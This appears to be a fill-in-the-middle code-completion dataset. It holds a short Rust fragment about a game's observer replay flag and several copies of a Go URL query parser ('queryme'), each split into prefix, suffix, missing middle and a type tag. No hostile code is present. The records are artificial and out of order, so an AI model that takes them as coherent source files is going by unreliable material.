pub unsafe fn with_replay_flag_if_obs<F: FnOnce() -> R, R>(func: F) -> R {
let was_replay = *vars::is_replay;
if is_local_player_observer() {
*vars::is_replay = 1;
}
let ret = func();
*vars::is_replay = was_replay;
ret
}
| {
// We need to redirect the name string to the storm player string, and replace the
// player value to unused player 10, whose color will be set to neutral resource
// color. (The neutral player 11 actually can have a different color for neutral
// buildings)
//
// Technically player 10 can actually have units in some odd UMS maps, but we
// aren't allowing observing UMS games anyways, so whatever. Even if the someone
// noticed the color changing, I doubt they would care.
(*ctrl).string = vars::storm_players[storm_id as usize].name.as_ptr();
(*ctrl).user_ptr = 10usize as *mut c_void;
(*vars::game).player_minimap_color[10] = *vars::resource_minimap_color;
} | conditional_block |
parser.go | package queryme
import (
"fmt"
"errors"
"net/url"
"strconv"
"strings"
"time"
"unicode/utf8"
)
/*
predicates = predicate *("," predicate)
predicate = (not / and / or / eq / lt / le / gt / ge)
not = "not" "(" predicate ")"
and = "and" "(" predicates ")"
or = "or" "(" predicates ")"
eq = "eq" "(" field "," values ")"
lt = "lt" "(" field "," value ")"
le = "le" "(" field "," value ")"
gt = "gt" "(" field "," value ")"
ge = "ge" "(" field "," value ")"
fts = "fts" "(" field "," string ")"
values = value *("," value)
value = (null / boolean / number / string / date)
null = "null"
boolean = "true" / "false"
number = 1*(DIGIT / "." / "e" / "E" / "+" / "-")
string = "$" *(unreserved / pct-encoded)
date = 4DIGIT "-" 2DIGIT "-" 2DIGIT *1("T" 2DIGIT ":" 2DIGIT ":" 2DIGIT *1("." 3DIGIT) "Z")
fieldorders = *1(fieldorder *("," fieldorder))
fieldorder = *1"!" field
field = *(unreserved / pct-encoded)
unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~"
pct-encoded = "%" HEXDIG HEXDIG
sub-delims = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "="
pchar = unreserved / pct-encoded / sub-delims / ":" / "@"
query = *( pchar / "/" / "?" )
*/
var (
SortOrderSeparatorExpected error = errors.New("Expected seperator ',' after sorted order.")
IdentifierExpected error = errors.New("Expected identifier.")
ValueExpected error = errors.New("Expected value.")
EndOfStringExpected error = errors.New("Expected end of string.")
StringExpected error = errors.New("Expected string.")
OperatorExpected error = errors.New("Expected operator.")
UnexpectedEndOfPredicate error = errors.New("Unexpected end of predicate.")
UnexpectedEndOfSortOrders error = errors.New("Unexpected end of sort orders.")
characters []byte
)
func init() {
characters = make([]byte, 128)
characters[int('=')] = 1
characters[int('&')] = 1
characters[int('!')] = 2
characters[int('\'')] = 2
characters[int('(')] = 2
characters[int(')')] = 2
characters[int('*')] = 2
characters[int(',')] = 2
characters[int(';')] = 2
characters[int('/')] = 2
characters[int('?')] = 2
characters[int('@')] = 2
characters[int('$')] = 3
characters[int('+')] = 3
characters[int(':')] = 3
// 'pct-encoded' characters
characters[int('%')] = 4
// 'unreserved' characters
characters[int('-')] = 5
characters[int('.')] = 5
characters[int('_')] = 5
characters[int('~')] = 5
for i := int('0'); i <= int('9'); i++ {
characters[i] = 5
}
for i := int('a'); i <= int('z'); i++ {
characters[i] = 5
}
for i := int('A'); i <= int('Z'); i++ {
characters[i] = 5
}
}
func firstCharClass(s string) byte {
r, _ := utf8.DecodeRuneInString(s)
if r > 127 {
return 0
} else {
return characters[r]
}
}
func charClassDetector(min byte, max byte) func(r rune) bool {
return func(r rune) bool {
i := int(r)
if i > 127 {
return false
}
c := characters[i]
return c >= min && c <= max
}
}
// QueryString is a parsed query part of a URL.
type QueryString struct {
fields map[string]string
}
// NewFromRawQuery creates a new QueryString from a raw query string.
func NewFromRawQuery(rawQuery string) *QueryString {
qs := new(QueryString)
qs.fields = make(map[string]string)
for {
i := strings.IndexRune(rawQuery, '=')
if i == -1 {
break
}
name := rawQuery[:i]
rawQuery = rawQuery[i+1:]
i = strings.IndexFunc(rawQuery, charClassDetector(1, 1))
var value string
if i == -1 {
value = rawQuery
} else {
value = rawQuery[:i]
rawQuery = rawQuery[i+1:]
}
qs.fields[name] = value
if i == -1 {
break
}
}
return qs
}
// NewFromRawQuery creates a new QueryString from an existing URL object.
func NewFromURL(url *url.URL) *QueryString {
return NewFromRawQuery(url.RawQuery)
}
// Tests if specified name has been found in query string.
func (q *QueryString) Contains(name string) bool {
_, ok := q.fields[name]
return ok
}
// Returns raw query string value.
func (q *QueryString) Raw(name string) (string, bool) {
v, ok := q.fields[name]
return v, ok
}
// Predicate parses the given component of the query as a predicate, then returns it.
func (q *QueryString) Predicate(name string) (p Predicate, err error) {
defer func() {
if rec := recover(); rec != nil {
err = rec.(error)
}
}()
raw, ok := q.fields[name]
if !ok {
return nil, fmt.Errorf("field not found: %q", name)
}
p, raw = parsePredicate(raw)
if len(raw) != 0 {
p = nil
err = UnexpectedEndOfPredicate
}
return
}
// Predicate parses the given component of the query as a sort order, then returns it.
func (q *QueryString) SortOrder(name string) (os []*SortOrder, err error) {
defer func() {
if rec := recover(); rec != nil {
err = rec.(error)
}
}()
raw, ok := q.fields[name]
if !ok {
return nil, fmt.Errorf("field not found: %q", name)
}
os, raw = parseSortOrders(raw)
if len(raw) != 0 {
os = nil
err = UnexpectedEndOfSortOrders
}
return
}
func | (s string) (p Predicate, n string) {
if len(s) == 0 {
panic(OperatorExpected)
}
var op string
op, n = parseIdentifier(s)
n = parseLiteral(n, "(")
var f string
var ps []Predicate
var vs []Value
var v Value
switch op {
case "not":
var operand Predicate
operand, n = parsePredicate(n)
p = Not{operand}
case "and":
ps, n = parsePredicates(n)
p = And(ps)
case "or":
ps, n = parsePredicates(n)
p = Or(ps)
case "eq":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
vs, n = parseValues(n)
p = Eq{Field(f), vs}
case "gt":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Gt{Field(f), v}
case "ge":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Ge{Field(f), v}
case "lt":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Lt{Field(f), v}
case "le":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Le{Field(f), v}
case "fts":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
s, n = parseString(n)
p = Fts{Field(f), s}
default:
panic(fmt.Errorf("Invalid operator: %q", op))
}
n = parseLiteral(n, ")")
return
}
func parsePredicates(s string) (ps []Predicate, n string) {
ps = make([]Predicate, 0, 4)
if len(s) > 0 && firstCharClass(s) > 2 {
n = s
for {
var operand Predicate
operand, n = parsePredicate(n)
ps = append(ps, operand)
if len(n) > 0 && n[0] == ',' {
n = n[1:]
} else {
break
}
}
}
return
}
func ParseValues(s string) ([]Value, error) {
vs, n := parseValues(s)
if n != "" {
return vs, EndOfStringExpected
}
return vs, nil
}
func parseValues(s string) (vs []Value, n string) {
vs = make([]Value, 0, 4)
if len(s) > 0 && firstCharClass(s) > 2 {
n = s
for {
var operand interface{}
operand, n = parseValue(n)
vs = append(vs, operand)
if len(n) > 0 && n[0] == ',' {
n = n[1:]
} else {
break
}
}
}
return
}
func parseString(s string) (v string, n string) {
if len(s) == 0 || s[0] != '$' {
panic(StringExpected)
}
s = s[1:]
l := strings.IndexFunc(s, charClassDetector(1, 2))
if l == -1 {
l = len(s)
}
var err error
if v, err = url.QueryUnescape(s[:l]); err != nil {
panic(err)
}
n = s[l:]
return
}
func ParseValue(s string) (Value, error) {
v, n := parseValue(s)
if n != "" {
return v, EndOfStringExpected
}
return v, nil
}
func parseValue(s string) (v Value, n string) {
if len(s) == 0 {
panic(ValueExpected)
}
r, l := utf8.DecodeRuneInString(s)
switch(r) {
case 'n':
n = parseLiteral(s, "null")
v = nil
case 't':
n = parseLiteral(s, "true")
v = true
case 'f':
n = parseLiteral(s, "false")
v = false
case '$':
v, n = parseString(s)
default:
if l = strings.IndexFunc(s, charClassDetector(1, 2)); l == -1 {
l = len(s)
}
if (l == 10 || ((l == 20 || (l == 24 && s[19] == '.')) && s[10] == 'T' && s[13] == ':' && s[16] == ':' && s[l-1] == 'Z')) && s[4] == '-' && s[7] == '-' {
var err error
var yr, mo, dy, hr, mn, sc, ms int64 = 0, 0, 0, 0, 0, 0, 0
if yr, err = strconv.ParseInt(s[0:4], 10, 32); err != nil {
panic(err)
}
if mo, err = strconv.ParseInt(s[5:7], 10, 32); err != nil {
panic(err)
}
if dy, err = strconv.ParseInt(s[8:10], 10, 32); err != nil {
panic(err)
}
if l >= 20 {
if hr, err = strconv.ParseInt(s[11:13], 10, 32); err != nil {
panic(err)
}
if mn, err = strconv.ParseInt(s[14:16], 10, 32); err != nil {
panic(err)
}
if sc, err = strconv.ParseInt(s[17:19], 10, 32); err != nil {
panic(err)
}
if l == 24 {
if ms, err = strconv.ParseInt(s[20:23], 10, 32); err != nil {
panic(err)
}
}
}
v = time.Date(int(yr), time.Month(mo), int(dy), int(hr), int(mn), int(sc), int(ms) * 1000000, time.UTC)
} else {
if f, err := strconv.ParseFloat(s[:l], 64); err != nil {
panic(err)
} else {
v = f
}
}
n = s[l:]
}
return
}
func parseLiteral(s string, expected string) (n string) {
if len(s) < len(expected) || s[:len(expected)] != expected {
panic(fmt.Errorf("expected: %q", expected))
}
return s[len(expected):]
}
func parseSortOrders(s string) (os []*SortOrder, n string) {
os = make([]*SortOrder, 0, 4)
if len(s) > 0 {
for {
var o *SortOrder
o, s = parseSortOrder(s)
os = append(os, o)
if len(s) == 0 {
break
}
if r, l := utf8.DecodeRuneInString(s); r != ',' {
panic(SortOrderSeparatorExpected)
} else {
s = s[l:]
}
}
}
n = s
return
}
func parseSortOrder(s string) (o *SortOrder, n string) {
o = new(SortOrder)
if r, _ := utf8.DecodeRuneInString(s); r == '!' {
s = s[1:]
} else {
o.Ascending = true
}
f, n := parseIdentifier(s)
o.Field = Field(f)
return
}
func ParseIdentifier(s string) (Value, error) {
v, n := parseIdentifier(s)
if n != "" {
return v, EndOfStringExpected
}
return v, nil
}
func parseIdentifier(s string) (id string, n string) {
if len(s) == 0 {
panic(IdentifierExpected)
}
i := strings.IndexFunc(s, charClassDetector(1, 3))
if i == 0 {
panic(IdentifierExpected)
}
if i == -1 {
n = ""
} else {
n = s[i:]
s = s[:i]
}
var err error
if id, err = url.QueryUnescape(s); err != nil {
panic(err)
}
return
}
| parsePredicate | identifier_name |
parser.go | package queryme
import (
"fmt"
"errors"
"net/url"
"strconv"
"strings"
"time"
"unicode/utf8"
)
/*
predicates = predicate *("," predicate)
predicate = (not / and / or / eq / lt / le / gt / ge)
not = "not" "(" predicate ")"
and = "and" "(" predicates ")"
or = "or" "(" predicates ")"
eq = "eq" "(" field "," values ")"
lt = "lt" "(" field "," value ")"
le = "le" "(" field "," value ")"
gt = "gt" "(" field "," value ")"
ge = "ge" "(" field "," value ")"
fts = "fts" "(" field "," string ")"
values = value *("," value)
value = (null / boolean / number / string / date)
null = "null"
boolean = "true" / "false"
number = 1*(DIGIT / "." / "e" / "E" / "+" / "-")
string = "$" *(unreserved / pct-encoded)
date = 4DIGIT "-" 2DIGIT "-" 2DIGIT *1("T" 2DIGIT ":" 2DIGIT ":" 2DIGIT *1("." 3DIGIT) "Z")
fieldorders = *1(fieldorder *("," fieldorder))
fieldorder = *1"!" field
field = *(unreserved / pct-encoded)
unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~"
pct-encoded = "%" HEXDIG HEXDIG
sub-delims = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "="
pchar = unreserved / pct-encoded / sub-delims / ":" / "@"
query = *( pchar / "/" / "?" )
*/
var (
SortOrderSeparatorExpected error = errors.New("Expected seperator ',' after sorted order.")
IdentifierExpected error = errors.New("Expected identifier.")
ValueExpected error = errors.New("Expected value.")
EndOfStringExpected error = errors.New("Expected end of string.")
StringExpected error = errors.New("Expected string.")
OperatorExpected error = errors.New("Expected operator.")
UnexpectedEndOfPredicate error = errors.New("Unexpected end of predicate.")
UnexpectedEndOfSortOrders error = errors.New("Unexpected end of sort orders.")
characters []byte
)
func init() {
characters = make([]byte, 128)
characters[int('=')] = 1
characters[int('&')] = 1
characters[int('!')] = 2
characters[int('\'')] = 2
characters[int('(')] = 2
characters[int(')')] = 2
characters[int('*')] = 2
characters[int(',')] = 2
characters[int(';')] = 2
characters[int('/')] = 2
characters[int('?')] = 2
characters[int('@')] = 2
characters[int('$')] = 3
characters[int('+')] = 3
characters[int(':')] = 3
// 'pct-encoded' characters
characters[int('%')] = 4
// 'unreserved' characters
characters[int('-')] = 5
characters[int('.')] = 5
characters[int('_')] = 5
characters[int('~')] = 5
for i := int('0'); i <= int('9'); i++ {
characters[i] = 5
}
for i := int('a'); i <= int('z'); i++ {
characters[i] = 5
}
for i := int('A'); i <= int('Z'); i++ {
characters[i] = 5
}
}
func firstCharClass(s string) byte {
r, _ := utf8.DecodeRuneInString(s)
if r > 127 {
return 0
} else {
return characters[r]
}
}
func charClassDetector(min byte, max byte) func(r rune) bool {
return func(r rune) bool {
i := int(r)
if i > 127 {
return false
}
c := characters[i]
return c >= min && c <= max
}
}
// QueryString is a parsed query part of a URL.
type QueryString struct {
fields map[string]string
}
// NewFromRawQuery creates a new QueryString from a raw query string.
func NewFromRawQuery(rawQuery string) *QueryString {
qs := new(QueryString)
qs.fields = make(map[string]string)
for {
i := strings.IndexRune(rawQuery, '=')
if i == -1 {
break
}
name := rawQuery[:i]
rawQuery = rawQuery[i+1:]
i = strings.IndexFunc(rawQuery, charClassDetector(1, 1))
var value string
if i == -1 {
value = rawQuery
} else {
value = rawQuery[:i]
rawQuery = rawQuery[i+1:]
}
qs.fields[name] = value
if i == -1 {
break
}
}
return qs
}
// NewFromRawQuery creates a new QueryString from an existing URL object.
func NewFromURL(url *url.URL) *QueryString {
return NewFromRawQuery(url.RawQuery)
}
// Tests if specified name has been found in query string.
func (q *QueryString) Contains(name string) bool {
_, ok := q.fields[name]
return ok
}
// Returns raw query string value.
func (q *QueryString) Raw(name string) (string, bool) {
v, ok := q.fields[name]
return v, ok
}
// Predicate parses the given component of the query as a predicate, then returns it.
func (q *QueryString) Predicate(name string) (p Predicate, err error) {
defer func() {
if rec := recover(); rec != nil {
err = rec.(error)
}
}()
raw, ok := q.fields[name]
if !ok {
return nil, fmt.Errorf("field not found: %q", name)
}
p, raw = parsePredicate(raw)
if len(raw) != 0 {
p = nil
err = UnexpectedEndOfPredicate
}
return
}
// Predicate parses the given component of the query as a sort order, then returns it.
func (q *QueryString) SortOrder(name string) (os []*SortOrder, err error) {
defer func() {
if rec := recover(); rec != nil {
err = rec.(error)
}
}()
raw, ok := q.fields[name]
if !ok {
return nil, fmt.Errorf("field not found: %q", name)
}
os, raw = parseSortOrders(raw)
if len(raw) != 0 {
os = nil
err = UnexpectedEndOfSortOrders
}
return
}
func parsePredicate(s string) (p Predicate, n string) {
if len(s) == 0 {
panic(OperatorExpected)
}
var op string
op, n = parseIdentifier(s)
n = parseLiteral(n, "(")
var f string
var ps []Predicate
var vs []Value
var v Value
switch op {
case "not":
var operand Predicate
operand, n = parsePredicate(n)
p = Not{operand}
case "and":
ps, n = parsePredicates(n)
p = And(ps)
case "or":
ps, n = parsePredicates(n)
p = Or(ps)
case "eq":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
vs, n = parseValues(n)
p = Eq{Field(f), vs}
case "gt":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Gt{Field(f), v}
case "ge":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Ge{Field(f), v}
case "lt":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Lt{Field(f), v}
case "le":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Le{Field(f), v}
case "fts":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
s, n = parseString(n)
p = Fts{Field(f), s}
default:
panic(fmt.Errorf("Invalid operator: %q", op))
}
n = parseLiteral(n, ")")
return
}
func parsePredicates(s string) (ps []Predicate, n string) {
ps = make([]Predicate, 0, 4)
if len(s) > 0 && firstCharClass(s) > 2 {
n = s
for {
var operand Predicate
operand, n = parsePredicate(n)
ps = append(ps, operand)
if len(n) > 0 && n[0] == ',' {
n = n[1:]
} else {
break
}
}
}
return
}
func ParseValues(s string) ([]Value, error) {
vs, n := parseValues(s)
if n != "" {
return vs, EndOfStringExpected
}
return vs, nil
}
func parseValues(s string) (vs []Value, n string) {
vs = make([]Value, 0, 4)
if len(s) > 0 && firstCharClass(s) > 2 {
n = s
for {
var operand interface{}
operand, n = parseValue(n)
vs = append(vs, operand)
if len(n) > 0 && n[0] == ',' {
n = n[1:]
} else {
break
}
}
}
return
}
func parseString(s string) (v string, n string) {
if len(s) == 0 || s[0] != '$' {
panic(StringExpected)
}
s = s[1:]
l := strings.IndexFunc(s, charClassDetector(1, 2))
if l == -1 {
l = len(s)
}
var err error
if v, err = url.QueryUnescape(s[:l]); err != nil {
panic(err)
}
n = s[l:]
return
}
func ParseValue(s string) (Value, error) {
v, n := parseValue(s)
if n != "" {
return v, EndOfStringExpected
}
return v, nil
}
func parseValue(s string) (v Value, n string) {
if len(s) == 0 {
panic(ValueExpected)
}
r, l := utf8.DecodeRuneInString(s)
switch(r) {
case 'n':
n = parseLiteral(s, "null")
v = nil
case 't':
n = parseLiteral(s, "true")
v = true
case 'f':
n = parseLiteral(s, "false")
v = false
case '$':
v, n = parseString(s)
default:
if l = strings.IndexFunc(s, charClassDetector(1, 2)); l == -1 {
l = len(s)
}
if (l == 10 || ((l == 20 || (l == 24 && s[19] == '.')) && s[10] == 'T' && s[13] == ':' && s[16] == ':' && s[l-1] == 'Z')) && s[4] == '-' && s[7] == '-' {
var err error
var yr, mo, dy, hr, mn, sc, ms int64 = 0, 0, 0, 0, 0, 0, 0
if yr, err = strconv.ParseInt(s[0:4], 10, 32); err != nil {
panic(err)
}
if mo, err = strconv.ParseInt(s[5:7], 10, 32); err != nil {
panic(err)
}
if dy, err = strconv.ParseInt(s[8:10], 10, 32); err != nil {
panic(err)
}
if l >= 20 {
if hr, err = strconv.ParseInt(s[11:13], 10, 32); err != nil {
panic(err)
}
if mn, err = strconv.ParseInt(s[14:16], 10, 32); err != nil {
panic(err)
}
if sc, err = strconv.ParseInt(s[17:19], 10, 32); err != nil {
panic(err)
}
if l == 24 {
if ms, err = strconv.ParseInt(s[20:23], 10, 32); err != nil {
panic(err)
}
}
}
v = time.Date(int(yr), time.Month(mo), int(dy), int(hr), int(mn), int(sc), int(ms) * 1000000, time.UTC)
} else {
if f, err := strconv.ParseFloat(s[:l], 64); err != nil {
panic(err)
} else {
v = f
}
}
n = s[l:]
}
return
}
func parseLiteral(s string, expected string) (n string) {
if len(s) < len(expected) || s[:len(expected)] != expected {
panic(fmt.Errorf("expected: %q", expected))
}
return s[len(expected):]
}
| for {
var o *SortOrder
o, s = parseSortOrder(s)
os = append(os, o)
if len(s) == 0 {
break
}
if r, l := utf8.DecodeRuneInString(s); r != ',' {
panic(SortOrderSeparatorExpected)
} else {
s = s[l:]
}
}
}
n = s
return
}
func parseSortOrder(s string) (o *SortOrder, n string) {
o = new(SortOrder)
if r, _ := utf8.DecodeRuneInString(s); r == '!' {
s = s[1:]
} else {
o.Ascending = true
}
f, n := parseIdentifier(s)
o.Field = Field(f)
return
}
func ParseIdentifier(s string) (Value, error) {
v, n := parseIdentifier(s)
if n != "" {
return v, EndOfStringExpected
}
return v, nil
}
func parseIdentifier(s string) (id string, n string) {
if len(s) == 0 {
panic(IdentifierExpected)
}
i := strings.IndexFunc(s, charClassDetector(1, 3))
if i == 0 {
panic(IdentifierExpected)
}
if i == -1 {
n = ""
} else {
n = s[i:]
s = s[:i]
}
var err error
if id, err = url.QueryUnescape(s); err != nil {
panic(err)
}
return
} | func parseSortOrders(s string) (os []*SortOrder, n string) {
os = make([]*SortOrder, 0, 4)
if len(s) > 0 { | random_line_split |
parser.go | package queryme
import (
"fmt"
"errors"
"net/url"
"strconv"
"strings"
"time"
"unicode/utf8"
)
/*
predicates = predicate *("," predicate)
predicate = (not / and / or / eq / lt / le / gt / ge)
not = "not" "(" predicate ")"
and = "and" "(" predicates ")"
or = "or" "(" predicates ")"
eq = "eq" "(" field "," values ")"
lt = "lt" "(" field "," value ")"
le = "le" "(" field "," value ")"
gt = "gt" "(" field "," value ")"
ge = "ge" "(" field "," value ")"
fts = "fts" "(" field "," string ")"
values = value *("," value)
value = (null / boolean / number / string / date)
null = "null"
boolean = "true" / "false"
number = 1*(DIGIT / "." / "e" / "E" / "+" / "-")
string = "$" *(unreserved / pct-encoded)
date = 4DIGIT "-" 2DIGIT "-" 2DIGIT *1("T" 2DIGIT ":" 2DIGIT ":" 2DIGIT *1("." 3DIGIT) "Z")
fieldorders = *1(fieldorder *("," fieldorder))
fieldorder = *1"!" field
field = *(unreserved / pct-encoded)
unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~"
pct-encoded = "%" HEXDIG HEXDIG
sub-delims = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "="
pchar = unreserved / pct-encoded / sub-delims / ":" / "@"
query = *( pchar / "/" / "?" )
*/
var (
SortOrderSeparatorExpected error = errors.New("Expected seperator ',' after sorted order.")
IdentifierExpected error = errors.New("Expected identifier.")
ValueExpected error = errors.New("Expected value.")
EndOfStringExpected error = errors.New("Expected end of string.")
StringExpected error = errors.New("Expected string.")
OperatorExpected error = errors.New("Expected operator.")
UnexpectedEndOfPredicate error = errors.New("Unexpected end of predicate.")
UnexpectedEndOfSortOrders error = errors.New("Unexpected end of sort orders.")
characters []byte
)
func init() {
characters = make([]byte, 128)
characters[int('=')] = 1
characters[int('&')] = 1
characters[int('!')] = 2
characters[int('\'')] = 2
characters[int('(')] = 2
characters[int(')')] = 2
characters[int('*')] = 2
characters[int(',')] = 2
characters[int(';')] = 2
characters[int('/')] = 2
characters[int('?')] = 2
characters[int('@')] = 2
characters[int('$')] = 3
characters[int('+')] = 3
characters[int(':')] = 3
// 'pct-encoded' characters
characters[int('%')] = 4
// 'unreserved' characters
characters[int('-')] = 5
characters[int('.')] = 5
characters[int('_')] = 5
characters[int('~')] = 5
for i := int('0'); i <= int('9'); i++ {
characters[i] = 5
}
for i := int('a'); i <= int('z'); i++ {
characters[i] = 5
}
for i := int('A'); i <= int('Z'); i++ {
characters[i] = 5
}
}
func firstCharClass(s string) byte {
r, _ := utf8.DecodeRuneInString(s)
if r > 127 {
return 0
} else {
return characters[r]
}
}
func charClassDetector(min byte, max byte) func(r rune) bool {
return func(r rune) bool {
i := int(r)
if i > 127 {
return false
}
c := characters[i]
return c >= min && c <= max
}
}
// QueryString is a parsed query part of a URL.
type QueryString struct {
fields map[string]string
}
// NewFromRawQuery creates a new QueryString from a raw query string.
func NewFromRawQuery(rawQuery string) *QueryString {
qs := new(QueryString)
qs.fields = make(map[string]string)
for {
i := strings.IndexRune(rawQuery, '=')
if i == -1 {
break
}
name := rawQuery[:i]
rawQuery = rawQuery[i+1:]
i = strings.IndexFunc(rawQuery, charClassDetector(1, 1))
var value string
if i == -1 {
value = rawQuery
} else {
value = rawQuery[:i]
rawQuery = rawQuery[i+1:]
}
qs.fields[name] = value
if i == -1 {
break
}
}
return qs
}
// NewFromRawQuery creates a new QueryString from an existing URL object.
func NewFromURL(url *url.URL) *QueryString {
return NewFromRawQuery(url.RawQuery)
}
// Tests if specified name has been found in query string.
func (q *QueryString) Contains(name string) bool {
_, ok := q.fields[name]
return ok
}
// Returns raw query string value.
func (q *QueryString) Raw(name string) (string, bool) {
v, ok := q.fields[name]
return v, ok
}
// Predicate parses the given component of the query as a predicate, then returns it.
func (q *QueryString) Predicate(name string) (p Predicate, err error) {
defer func() {
if rec := recover(); rec != nil {
err = rec.(error)
}
}()
raw, ok := q.fields[name]
if !ok {
return nil, fmt.Errorf("field not found: %q", name)
}
p, raw = parsePredicate(raw)
if len(raw) != 0 {
p = nil
err = UnexpectedEndOfPredicate
}
return
}
// Predicate parses the given component of the query as a sort order, then returns it.
func (q *QueryString) SortOrder(name string) (os []*SortOrder, err error) {
defer func() {
if rec := recover(); rec != nil {
err = rec.(error)
}
}()
raw, ok := q.fields[name]
if !ok {
return nil, fmt.Errorf("field not found: %q", name)
}
os, raw = parseSortOrders(raw)
if len(raw) != 0 {
os = nil
err = UnexpectedEndOfSortOrders
}
return
}
func parsePredicate(s string) (p Predicate, n string) {
if len(s) == 0 {
panic(OperatorExpected)
}
var op string
op, n = parseIdentifier(s)
n = parseLiteral(n, "(")
var f string
var ps []Predicate
var vs []Value
var v Value
switch op {
case "not":
var operand Predicate
operand, n = parsePredicate(n)
p = Not{operand}
case "and":
ps, n = parsePredicates(n)
p = And(ps)
case "or":
ps, n = parsePredicates(n)
p = Or(ps)
case "eq":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
vs, n = parseValues(n)
p = Eq{Field(f), vs}
case "gt":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Gt{Field(f), v}
case "ge":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Ge{Field(f), v}
case "lt":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Lt{Field(f), v}
case "le":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Le{Field(f), v}
case "fts":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
s, n = parseString(n)
p = Fts{Field(f), s}
default:
panic(fmt.Errorf("Invalid operator: %q", op))
}
n = parseLiteral(n, ")")
return
}
func parsePredicates(s string) (ps []Predicate, n string) {
ps = make([]Predicate, 0, 4)
if len(s) > 0 && firstCharClass(s) > 2 {
n = s
for {
var operand Predicate
operand, n = parsePredicate(n)
ps = append(ps, operand)
if len(n) > 0 && n[0] == ',' {
n = n[1:]
} else {
break
}
}
}
return
}
func ParseValues(s string) ([]Value, error) {
vs, n := parseValues(s)
if n != "" {
return vs, EndOfStringExpected
}
return vs, nil
}
func parseValues(s string) (vs []Value, n string) {
vs = make([]Value, 0, 4)
if len(s) > 0 && firstCharClass(s) > 2 {
n = s
for {
var operand interface{}
operand, n = parseValue(n)
vs = append(vs, operand)
if len(n) > 0 && n[0] == ',' {
n = n[1:]
} else {
break
}
}
}
return
}
func parseString(s string) (v string, n string) {
if len(s) == 0 || s[0] != '$' {
panic(StringExpected)
}
s = s[1:]
l := strings.IndexFunc(s, charClassDetector(1, 2))
if l == -1 {
l = len(s)
}
var err error
if v, err = url.QueryUnescape(s[:l]); err != nil {
panic(err)
}
n = s[l:]
return
}
func ParseValue(s string) (Value, error) {
v, n := parseValue(s)
if n != "" {
return v, EndOfStringExpected
}
return v, nil
}
func parseValue(s string) (v Value, n string) {
if len(s) == 0 {
panic(ValueExpected)
}
r, l := utf8.DecodeRuneInString(s)
switch(r) {
case 'n':
n = parseLiteral(s, "null")
v = nil
case 't':
n = parseLiteral(s, "true")
v = true
case 'f':
n = parseLiteral(s, "false")
v = false
case '$':
v, n = parseString(s)
default:
if l = strings.IndexFunc(s, charClassDetector(1, 2)); l == -1 {
l = len(s)
}
if (l == 10 || ((l == 20 || (l == 24 && s[19] == '.')) && s[10] == 'T' && s[13] == ':' && s[16] == ':' && s[l-1] == 'Z')) && s[4] == '-' && s[7] == '-' {
var err error
var yr, mo, dy, hr, mn, sc, ms int64 = 0, 0, 0, 0, 0, 0, 0
if yr, err = strconv.ParseInt(s[0:4], 10, 32); err != nil {
panic(err)
}
if mo, err = strconv.ParseInt(s[5:7], 10, 32); err != nil {
panic(err)
}
if dy, err = strconv.ParseInt(s[8:10], 10, 32); err != nil {
panic(err)
}
if l >= 20 {
if hr, err = strconv.ParseInt(s[11:13], 10, 32); err != nil {
panic(err)
}
if mn, err = strconv.ParseInt(s[14:16], 10, 32); err != nil {
panic(err)
}
if sc, err = strconv.ParseInt(s[17:19], 10, 32); err != nil {
panic(err)
}
if l == 24 {
if ms, err = strconv.ParseInt(s[20:23], 10, 32); err != nil {
panic(err)
}
}
}
v = time.Date(int(yr), time.Month(mo), int(dy), int(hr), int(mn), int(sc), int(ms) * 1000000, time.UTC)
} else {
if f, err := strconv.ParseFloat(s[:l], 64); err != nil {
panic(err)
} else {
v = f
}
}
n = s[l:]
}
return
}
func parseLiteral(s string, expected string) (n string) {
if len(s) < len(expected) || s[:len(expected)] != expected {
panic(fmt.Errorf("expected: %q", expected))
}
return s[len(expected):]
}
func parseSortOrders(s string) (os []*SortOrder, n string) |
func parseSortOrder(s string) (o *SortOrder, n string) {
o = new(SortOrder)
if r, _ := utf8.DecodeRuneInString(s); r == '!' {
s = s[1:]
} else {
o.Ascending = true
}
f, n := parseIdentifier(s)
o.Field = Field(f)
return
}
func ParseIdentifier(s string) (Value, error) {
v, n := parseIdentifier(s)
if n != "" {
return v, EndOfStringExpected
}
return v, nil
}
func parseIdentifier(s string) (id string, n string) {
if len(s) == 0 {
panic(IdentifierExpected)
}
i := strings.IndexFunc(s, charClassDetector(1, 3))
if i == 0 {
panic(IdentifierExpected)
}
if i == -1 {
n = ""
} else {
n = s[i:]
s = s[:i]
}
var err error
if id, err = url.QueryUnescape(s); err != nil {
panic(err)
}
return
}
| {
os = make([]*SortOrder, 0, 4)
if len(s) > 0 {
for {
var o *SortOrder
o, s = parseSortOrder(s)
os = append(os, o)
if len(s) == 0 {
break
}
if r, l := utf8.DecodeRuneInString(s); r != ',' {
panic(SortOrderSeparatorExpected)
} else {
s = s[l:]
}
}
}
n = s
return
} | identifier_body |
